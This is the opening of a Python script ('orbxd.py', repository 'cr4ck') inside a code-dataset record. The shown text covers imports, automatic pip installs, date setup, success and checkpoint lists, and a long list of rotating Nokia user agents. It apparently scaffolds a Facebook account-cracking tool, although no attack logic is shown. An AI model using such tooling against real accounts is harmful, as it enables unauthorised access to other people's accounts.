| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4cea621dd013fc67bb97d9f75c40341c4bf13a7e
| 109,050
|
py
|
Python
|
orbxd.py
|
Recode24/cr4ck
|
264550c44487117ad01cb07bd88c156043eaefd7
|
[
"MIT"
] | null | null | null |
orbxd.py
|
Recode24/cr4ck
|
264550c44487117ad01cb07bd88c156043eaefd7
|
[
"MIT"
] | null | null | null |
orbxd.py
|
Recode24/cr4ck
|
264550c44487117ad01cb07bd88c156043eaefd7
|
[
"MIT"
] | null | null | null |
#coding=utf-8
#Open Source Code Syarat? Subrek Channel Gua & Jangan Ganti Bot Follow! Cukup Tambahkan Bot Follow Sajah!
# Ingat Ini Hanya Untuk Contoh Project!. Kalo Mau Recode, Recode Ajah Itung² Buat Latihan Lu
# Kalo Mau Izin, Izin lewat instgrm/email/fb Ajah
# insgrm : https://www.instagram.com/ngemry7
# email : xgansb@gmail.com
# fb : https://www.facebook.com/meyrina.setyaningrum
# Maaf klo codinganya berantakan dan banyak bug:)
import requests,bs4,sys,os,subprocess,getpass,hashlib
import random,time,re,json
import emailerendem,calendar,nande,orbxd
from datetime import datetime
from datetime import date
from concurrent.futures import ThreadPoolExecutor
from mechanize import Browser
from multiprocessing.pool import ThreadPool
from bs4 import BeautifulSoup as parser
from requests.exceptions import ConnectionError
from mechanize import Browser
# On Linux, define ANSI color escape codes and best-effort install the
# script's third-party dependencies via pip2 (the script targets Python 2).
# Each import is attempted in turn; on failure the package is installed and
# the remaining imports are NOT retried in this run (deliberate chain of
# try/else blocks — only one install is triggered per execution).
if 'linux' in sys.platform.lower():
    N = '\x1b[1;94m'  # bright blue
    G = '\x1b[1;92m'  # bright green
    O = '\x1b[1;97m'  # bright white
    R = '\x1b[1;91m'  # bright red
    try:
        import requests
    except ImportError:
        os.system('pip2 install requests')
    else:
        try:
            import mechanize
        except ImportError:
            os.system('pip2 install mechanize')
        else:
            try:
                import bs4
            except ImportError:
                os.system('pip2 install bs4')
def jalan(z):
    """Print *z* one character at a time (typewriter effect).

    Every character is written and flushed individually, followed by a
    short pause so the text appears to be typed out; a trailing newline
    is always appended. Returns None.
    """
    teks = z + '\n'
    for huruf in teks:
        sys.stdout.write(huruf)
        sys.stdout.flush()
        time.sleep(0.02)
# ANSI colour escape codes used for terminal output.
p = "\033[1;37m"  # white
o = "\033[1;36m"  # cyan
m = "\033[1;91m"  # light red
h = "\033[1;32m"  # green

loop = 0  # module-level counter (usage not visible in this chunk)
# Result buckets. NOTE: `id` shadows the builtin; the names are kept
# as-is because later parts of the script reference them. `ok`/`cp`
# presumably collect success/checkpoint results — can't confirm here.
id = []
ok = []
cp = []

ct = datetime.now()
n = ct.month  # 1..12
bulan = ["January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"]
try:
    # Guard is effectively dead (datetime months are always 1..12);
    # kept for behavioural parity with the original.
    if not 0 <= n <= 12:
        exit()
    nTemp = n - 1  # zero-based index into `bulan`
except ValueError:
    exit()

current = datetime.now()
ta = current.year   # current year
bu = current.month  # current month number
ha = current.day    # current day of month
op = bulan[nTemp]   # current month name in English
ahahahaha_kimochii_araaaaaa = random.choice(["Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5800d-1/60.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; NokiaX2-02/10.90; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.2.26.11", "Mozilla/5.0 (Symbian/3; Series60/5.3 NokiaE7-00/111.040.1511; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5230/51.0.002; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Symbian/3; Series60/5.3 NokiaC6-01/111.040.1511; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1", "Mozilla/5.0 (Series40; Nokia205.1/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia303/14.87; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Symbian/3; Series60/5.3 Nokia500/111.021.0028; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1", "Mozilla/5.0 (Series40; Nokia110/03.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.62.10", "Mozilla/5.0 (Series40; Nokia501/1.0; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.0.0.0.67", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia205/03.18; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaC5-06/23.6.015; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) 
NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia208/03.39; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia205/03.19; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia205.1/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia201/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; Nokia2700c-2/07.80; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia200/10.61; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia206/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia205/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia201/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.2.0.0.6", "Mozilla/5.0 (Series40; Nokia501/14.0.4/java_runtime_version=Nokia_Asha_1_2; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia205.3/03.19; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6", "Mozilla/5.0 (Series40; Nokia303/14.87; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia114/03.47; Profile/MIDP-2.1 
Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia311/03.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.31", "Mozilla/5.0 (Series40; Nokia2051/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia201/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Symbian/3; Series60/5.3 NokiaN8-00/111.040.1511; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/8.3.1.4 Mobile Safari/535.1", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5233/51.1.002; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia5130c-2/07.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/10.61; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia206/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia110/03.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; NokiaX2-02/11.84; Profile/MIDP-2.1 
Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia2055/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia112/03.28; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia110/03.33; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; NokiaX2-02/10.91; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia110/03.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia210/04.12; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia306/05.93; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia206/03.59; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.2.0.0.6", "Mozilla/5.0 (Series40; Nokia308/05.85; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia202/20.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.1.62.6", "Mozilla/5.0 (Series40; Nokia210.2/06.09; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; NokiaX2-01/08.70; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; NokiaC2-02/07.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia311/07.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) 
Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; NokiaX2-00/04.80; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia205/03.18; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia302/14.53; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia110/03.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.54", "Mozilla/5.0 (Series40; Nokia302/14.78; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; NokiaX2-02/11.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia112/03.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; NokiaC2-00/03.82; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1","Mozilla/5.0 (Series40; Nokia2055/03.20; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaC5-03/21.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.30 Mobile Safari/533.4 3gpp-gba", "Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 NokiaBrowser/1.0.1.54", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaX6-00/40.0.002; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) 
AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; NokiaX2-01/08.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; NokiaX2-02/11.79; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia110/03.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia206/03.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaC5-05/23.5.015; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4", "Mozilla/5.0 (Series40; Nokia311/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia302/14.78; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.68.14", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia302/15.15; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia200/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.2.0.0.6", "Mozilla/5.0 (Series40; Nokia205/03.19; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-03/07.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia202/20.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.1.0.0.62", 
"Mozilla/5.0 (Series40; Nokia205/03.18; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.1.0.0.62", "Mozilla/5.0 (Series40; Nokia311/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia311/03.90; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia202/20.28; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.2.0.0.6", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia112/03.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia206/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia202/20.28; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-03/07.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.55", "Mozilla/5.0 (Series40; NokiaC2-02/07.66; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; Nokia206/04.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia200/10.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.2.26.11", "Mozilla/5.0 (Series40; Nokia114/03.51; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; 
Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia202/20.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia305/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia112/03.26; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia114/03.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia305/07.42; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX3-02.5/06.75; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia305/03.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/10.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/04.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.0.0.45", "Mozilla/5.0 (Series40; Nokia311/07.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; NokiaC2-06/07.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia309/05.85; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia305/05.92; 
Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.2.0.0.6", "Mozilla/5.0 (Series40; Nokia202/20.36; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaX2-02/11.84; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-06/07.57; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; NokiaC2-06/07.48; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.56; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/03.58; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia210/04.12; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/03.59; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; NokiaC2-02/06.96; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.64; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia308/05.85; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.7.0.0.11", "Mozilla/5.0 (Series40; Nokia311/05.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia302/14.92; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/4.0.1.0.1", "Mozilla/5.0 (Series40; Nokia306/03.63; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia111/03.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; NokiaC2-06/07.63; Profile/MIDP-2.1 
Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia301/09.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.3.0.0.49", "Mozilla/5.0 (Series40; NokiaC2-03/06.96; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/11.95; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.36", "Mozilla/5.0 (Series40; Nokia200/10.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia206/03.60; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia205.1/03.18; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia111/03.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; NokiaC2-03/07.29; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/3.9.0.0.22", "Mozilla/5.0 (Series40; Nokia114/03.47; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.5.0.0.27", "Mozilla/5.0 (Series40; NokiaAsha230DualSIM/14.0.4/java_runtime_version=Nokia_Asha_1_2; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.30", "Mozilla/5.0 (Series40; Nokia208.4/04.06; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia200/12.04; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia203/20.52; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; Nokia114/03.33; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31", "Mozilla/5.0 (Series40; 
